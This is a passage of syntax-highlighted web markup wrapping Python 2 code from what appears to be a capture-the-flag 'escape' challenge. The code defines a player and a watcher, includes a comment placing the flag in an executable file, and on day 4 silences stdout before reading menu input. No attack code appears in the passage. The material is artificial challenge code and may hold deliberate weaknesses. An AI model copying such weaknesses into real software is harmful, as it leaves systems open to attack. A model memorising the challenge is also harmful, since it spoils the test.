font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-108&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;your&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Esacpe_Player&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-109&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;watcher&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Watcher&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-110&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-111&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;# FLAG is /FLAG_FILE~blahblah (this is only executable.)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-112&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-113&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-114&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;[day-%d] &quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;%&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;your&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;day&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-115&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;your&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;day&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-116&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;# Turn off the light&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-117&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Turn off the Light !!&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-118&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;stdout&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'/dev/null'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'w'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-119&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-120&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;menu&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-121&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;work&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-122&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;invalid_cmd&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-123&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span 